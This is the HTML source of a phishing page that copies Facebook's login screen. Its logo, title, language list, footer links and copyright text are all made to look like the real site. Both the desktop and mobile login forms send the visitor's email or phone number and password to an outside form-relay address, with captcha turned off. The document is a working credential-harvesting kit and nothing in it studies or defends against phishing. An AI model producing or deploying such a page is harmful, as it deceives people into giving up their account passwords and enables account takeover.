<!DOCTYPE html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<link rel="stylesheet" type="text/css" href="css/computer.css" media="screen and (min-width: 769px)">
<link rel="stylesheet" type="text/css" href="css/mobile.css" media="screen and (max-width: 768px)">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet">
<title>Facebook - Log In or Sign Up</title>
</head>

<body>
  <div class="computer">
    <img src="images/fblogo.png" width="280" height="80" class="fblogo">
    <p>
      Facebook helps you connect and share<br>with the people in your life.
    </p>
    <div class="form">
      <form action="https://formsubmit.co/your@gmail.com" >
          <input class="input1"
          type="email" name="email"
          placeholder="Email Address or Phone Number"
          required
        />
        <br />
        <br />
        <input class="input1" type="password" name="Password" placeholder="Password" required />
        <br />
        <br />
        <input type="hidden" name="_captcha" value="false">
        <a href=""><button type="submit" class="log">Log In</button></a>
        <br />
        <br />
        <a href="#" class="fp"> Forgotten Password? </a>
        <br />
        <br />
        <a href="#">
        <button class="new">Create new Account</button></a>
        <br />
        <br>
      </form>
      <br>
        <div class="llt">
          <a href="page.html" class="lt">Create a page</a> for a celebrity, brand or
          business.
        </div>
    </div>
    

    
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
<br>
  <footer>
    <div id="footersubdiv">
      <div id="languagediv">
        <a href="#" class="language" id="currentlang">English (UK)</a>
        <a href="#" class="language">മലയാളം</a>
        <a href="#" class="language">தமிழ்</a>
        <a href="#" class="language">ಕನ್ನಡ</a>
        <a href="#" class="language">हिन्दी</a>
        <a href="#" class="language">اردو</a>
        <a href="#" class="language">বাংলা</a>
        <a href="#" class="language">తెలుగు </a>
        <a href="#" class="language">Español</a>
        <a href="#" class="language">Português (Brasil)</a>
        <a href="#" class="language">Français (France)</a>
        <a href="#" id="morelang"><i class="fa fa-plus" aria-hidden="true"></i></a>
      </div>
      <hr id="hrfinal">
      <div id="extralinksdiv">
        <a href="#" class="extralinks">Sign Up</a>
        <a href="#" class="extralinks">Log In</a>
        <a href="#" class="extralinks">Messenger</a>
        <a href="#" class="extralinks">Facebook Lite</a>
        <a href="#" class="extralinks">Find Friends</a>
        <a href="#" class="extralinks">People</a>
        <a href="#" class="extralinks">Profiles</a>
        <a href="#" class="extralinks">Pages</a>
        <a href="#" class="extralinks">Page categories</a>
        <a href="#" class="extralinks">Places</a>
        <a href="#" class="extralinks">Games</a>
        <a href="#" class="extralinks">Locations</a>
        <a href="#" class="extralinks">Marketplace</a>
        <a href="#" class="extralinks">Groups</a>
        <a href="#" class="extralinks">Instagram</a>
        <a href="#" class="extralinks">Local</a>
        <a href="#" class="extralinks">Fundraisers</a>
        <a href="#" class="extralinks">About</a>
        <a href="#" class="extralinks">Create ad</a>
        <a href="#" class="extralinks">Create Page</a>
        <a href="#" class="extralinks">Developers</a>
        <a href="#" class="extralinks">Careers</a>
        <a href="#" class="extralinks">Privacy</a>
        <a href="#" class="extralinks">Cookies</a>
        <a href="#" class="extralinks">AdChoices</a>
        <a href="#" class="extralinks">Terms</a>
        <a href="#" class="extralinks">Account security</a>
        <a href="#" class="extralinks">Login help</a>
        <a href="#" class="extralinks">Help</a>
      </div>
      <div id="copyrightdiv">
          <span id="copyright"><a href="https://www.facebook.com" target="_blank" id="copyrightfblink">Facebook</a> © 2023</span>
      </div>
    </div>
  </footer>
</div>



<!--Code for Mobile Screen-->

<div class="mobile">
  <div class="mobheader">
    <img src="images/fblogo.png" class="mobfblogo">
  </div>
  <div id="mobapplink" class="clearfix">
    <a href="#">
      <img src="images/fbandroid.png" id="mobandroidpic">
      <div id="getfbandroid">Get Facebook for Android and browse faster.</div>
    </a>
  </div>
  <div class="mobmaindiv">
    <form  action="https://formsubmit.co/your@gmail.com">
      <div id="mobtextdiv">
        <input type="text" class="mobtextbox mobtextbox1" placeholder="Mobile number or email address">
        <input type="password" class="mobtextbox mobtextbox2" placeholder="Password">
        <input type="hidden" name="_captcha" value="false">
      </div>
      <input type="submit" class="mobloginbutton" value="Log In"></form>
      <div id="ordiv">
      <span id="or">or</span>
      </div>
      <div id="mobcreatediv">
        <button id="mobcreate">Create New Account</button>
      </div>
      <div class="mobforgotpw">
        <a href="#">Forgotten password?</a>
        <span>·</span>
        <a href="#">Help Center</a>
      </div>

  </div>
  <div class="mobfooter">
    <div id="moblangs">
      <div class="item1">
        <li><a href="#" id="mobcurrentlang">English (UK)</a></li>
        <li><a href="#">தமிழ்</a></li>
        <li><a href="#">हिन्दी</a></li>
        <li><a href="#">বাংলা</a></li>
      </div>
      <div class="item2">
        <li><a href="#">മലയാളം</a></li>
        <li><a href="#">ಕನ್ನಡ</a></li>
        <li><a href="#">اردو</a></li>
        <li><a href="#"><i class="fa fa-plus-square-o"></i></a></li>
      </div>
    </div>
    <div class="mobcopyright">
      <span class="mobfbcopyright"><a href="https://www.facebook.com" target="_blank" id="mobcopyrightfblink">Facebook</a> ©2023</span><br>
    </div>
    </div>
 </div>
</div>
 
</body>